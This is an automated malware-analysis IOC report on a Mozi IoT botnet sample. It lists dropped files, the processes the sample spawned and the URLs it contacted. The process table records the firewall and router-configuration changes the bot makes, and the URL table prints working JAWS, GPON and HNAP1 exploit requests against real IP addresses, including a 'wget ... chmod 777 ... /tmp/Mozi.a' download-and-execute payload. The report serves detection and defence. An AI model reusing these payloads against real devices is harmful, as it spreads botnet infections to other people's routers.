Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

mozi.a.zip

ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped

initial sample

/etc/init.d/S95baby.sh

POSIX shell script, ASCII text executable

dropped

/etc/init.d/bootmisc.sh

ASCII text

dropped

/etc/init.d/checkfs.sh

ASCII text

dropped

/etc/init.d/checkroot-bootclean.sh

ASCII text

dropped

/etc/init.d/checkroot.sh

ASCII text

dropped

/etc/init.d/hostname.sh

ASCII text

dropped

/etc/init.d/hwclock.sh

ASCII text

dropped

/etc/init.d/mountall-bootclean.sh

ASCII text

dropped

/etc/init.d/mountall.sh

ASCII text

dropped

/etc/init.d/mountdevsubfs.sh

ASCII text

dropped

/etc/init.d/mountkernfs.sh

ASCII text

dropped

/etc/init.d/mountnfs-bootclean.sh

ASCII text

dropped

/etc/init.d/mountnfs.sh

ASCII text

dropped

/etc/init.d/umountnfs.sh

ASCII text

dropped

/etc/profile.d/Z97-byobu.sh

ASCII text

dropped

/etc/profile.d/apps-bin-path.sh

ASCII text

dropped

/etc/profile.d/bash_completion.sh

ASCII text

dropped

/etc/profile.d/cedilla-portuguese.sh

ASCII text

dropped

/etc/profile.d/vte-2.91.sh

ASCII text

dropped

/etc/rc.local

ASCII text

dropped

/etc/rcS.d/S95baby.sh

POSIX shell script, ASCII text executable

dropped

/usr/bin/gettext.sh

ASCII text

dropped

/usr/networks

ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped

dropped

/usr/sbin/alsa-info.sh

ASCII text, with very long lines

dropped

/boot/grub/i386-pc/modinfo.sh

ASCII text

dropped

/etc/acpi/asus-keyboard-backlight.sh

ASCII text

dropped

/etc/acpi/asus-wireless.sh

ASCII text

dropped

/etc/acpi/ibm-wireless.sh

ASCII text

dropped

/etc/acpi/powerbtn.sh

ASCII text

dropped

/etc/acpi/tosh-wireless.sh

ASCII text

dropped

/etc/acpi/undock.sh

ASCII text

dropped

/etc/bash_completion.d/libreoffice.sh

ASCII text

dropped

/etc/wpa_supplicant/action_wpa.sh

ASCII text

dropped

/etc/wpa_supplicant/functions.sh

ASCII text

dropped

/etc/wpa_supplicant/ifupdown.sh

ASCII text

dropped

/tmp/.config

ASCII text

dropped

/usr/share/alsa-base/alsa-info.sh

ASCII text, with very long lines

dropped

/usr/share/alsa/utils.sh

ASCII text

dropped

/usr/share/brltty/initramfs/brltty.sh

ASCII text

dropped

/usr/share/cups/braille/cups-braille.sh

UTF-8 Unicode text

dropped

/usr/share/cups/braille/index.sh

ASCII text

dropped

/usr/share/cups/braille/indexv3.sh

ASCII text

dropped

/usr/share/cups/braille/indexv4.sh

ASCII text

dropped

/usr/share/debconf/confmodule.sh

ASCII text

dropped

/usr/share/doc/acpid/examples/ac.sh

ASCII text

dropped

/usr/share/doc/acpid/examples/default.sh

ASCII text

dropped

/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh

ASCII text

dropped

/usr/share/doc/cron/examples/cron-tasks-review.sh

ASCII text

dropped

/usr/share/doc/gawk/examples/network/PostAgent.sh

ASCII text

dropped

/usr/share/doc/gawk/examples/prog/igawk.sh

awk or perl script, ASCII text

dropped

/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh

ASCII text

dropped

/usr/share/doc/gdb/contrib/ari/gdb_find.sh

ASCII text

dropped

/usr/share/doc/gdb/contrib/expect-read1.sh

ASCII text

dropped

/usr/share/doc/gdb/contrib/gdb-add-index.sh

ASCII text

dropped

/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-am.sh

OS/2 REXX batch file, ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-checkout.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-clean.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-clone.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-commit.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-fetch.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-gc.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-log.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-ls-remote.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-merge-ours.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-merge.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-notes.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-pull.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-repack.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-reset.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-resolve.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-revert.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-tag.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-verify-tag.sh

ASCII text

dropped

/usr/share/doc/git/contrib/examples/git-whatchanged.sh

ASCII text

dropped

/usr/share/doc/git/contrib/fast-import/git-import.sh

ASCII text

dropped

/usr/share/doc/git/contrib/git-resurrect.sh

ASCII text

dropped

/usr/share/doc/git/contrib/remotes2config.sh

ASCII text

dropped

/usr/share/doc/git/contrib/rerere-train.sh

ASCII text

dropped

/usr/share/doc/git/contrib/subtree/git-subtree.sh

ASCII text

dropped

/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh

ASCII text

dropped

/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh

ASCII text

dropped

/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh

ASCII text

dropped

/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh

ASCII text

dropped

/usr/share/doc/hddtemp/contribs/hddtemp-all.sh

ASCII text

dropped

/usr/share/doc/ifupdown/examples/check-mac-address.sh

ASCII text

dropped

/usr/share/doc/ifupdown/examples/get-mac-address.sh

ASCII text

dropped

/usr/share/doc/ifupdown/examples/pcmcia-compat.sh

ASCII text

dropped

/usr/share/doc/ifupdown/examples/ping-places.sh

ASCII text

dropped

/usr/share/doc/lm-sensors/examples/daemon/healthd.sh

ASCII text

dropped

/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh

ASCII text

dropped

/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh

ASCII text

dropped

/usr/share/doc/mdadm/examples/mdadd.sh

ASCII text

dropped

/usr/share/doc/netcat-openbsd/examples/dist.sh

ASCII text

dropped

/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh

ASCII text

dropped

/usr/share/doc/tmux/examples/bash_completion_tmux.sh

ASCII text

dropped

/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh

ASCII text

dropped

/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh

ASCII text

dropped

/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh

ASCII text

dropped

/usr/share/doc/xdotool/examples/ffsp.sh

ASCII text

dropped

/usr/share/hplip/hplip_clean.sh

ASCII text

dropped

/usr/share/keyutils/request-key-debug.sh

ASCII text

dropped

/usr/share/lightdm/guest-session/setup.sh

ASCII text

dropped

/usr/share/os-prober/common.sh

ASCII text

dropped

/usr/share/vim/vim74/macros/less.sh

ASCII text

dropped

/usr/share/xscreensaver/xscreensaver-wrapper.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/headers.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh

C source, ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/tags.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/spl/autogen.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh

awk or perl script, ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh

awk or perl script, ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh

awk or perl script, ASCII text, with very long lines

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh

awk or perl script, ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh

ASCII text

dropped

/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh

ASCII text

dropped

/var/crash/_usr_share_apport_apport-checkreports.1000.crash

ASCII text

dropped

/var/crash/_usr_share_apport_apport-gtk.1000.crash

ASCII text

dropped

There are 212 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

/tmp/mozi.a.zip

/usr/bin/qemu-arm /tmp/mozi.a.zip

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

/bin/sh

n/a

/usr/bin/killall

killall -9 telnetd utelnetd scfgmgr

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT

/sbin/iptables

n/a

/sbin/modprobe

/sbin/modprobe ip_tables

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --dport 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --destination-port 58000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --dport 58000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --sport 58000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --destination-port 35000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --destination-port 50023 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --destination-port 7547 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --dport 35000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --dport 50023 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --sport 50023 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --sport 35000 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p tcp --dport 7547 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p tcp --sport 7547 -j DROP

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I INPUT -p udp --dport 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT

/tmp/mozi.a.zip

n/a

/bin/sh

/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"

/bin/sh

n/a

/sbin/iptables

iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT

/sbin/upstart

n/a

/bin/sh

/bin/sh -e /proc/self/fd/9

/bin/sh

n/a

/bin/date

date

/bin/sh

n/a

/usr/share/apport/apport-checkreports

/usr/bin/python3 /usr/share/apport/apport-checkreports --system

/sbin/upstart

n/a

/bin/sh

/bin/sh -e /proc/self/fd/9

/bin/sh

n/a

/bin/date

date

/bin/sh

n/a

/usr/share/apport/apport-gtk

/usr/bin/python3 /usr/share/apport/apport-gtk

/sbin/upstart

n/a

/bin/sh

/bin/sh -e /proc/self/fd/9

/bin/sh

n/a

/bin/date

date

/bin/sh

n/a

/usr/share/apport/apport-gtk

/usr/bin/python3 /usr/share/apport/apport-gtk

There are 155 hidden processes, click here to show them.

URLs

Name

Malicious

http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

13.89.231.175

http://%s:%d/bin.sh;chmod

unknown

http://127.0.0.1:80/GponForm/diag_Form?images/

151.139.241.251

http://180.254.107.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

180.254.107.55

http://175.203.81.2:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

175.203.81.2

http://23.12.191.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

23.12.191.118

http://193.248.153.76:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

193.248.153.76

http://23.254.64.88:80/HNAP1/

23.254.64.88

http://159.140.205.214:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

159.140.205.214

http://34.66.226.190:80/HNAP1/

34.66.226.190

http://%s:%d/bin.sh

unknown

http://47.246.22.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

47.246.22.230

http://144.76.43.37:80/HNAP1/

144.76.43.37

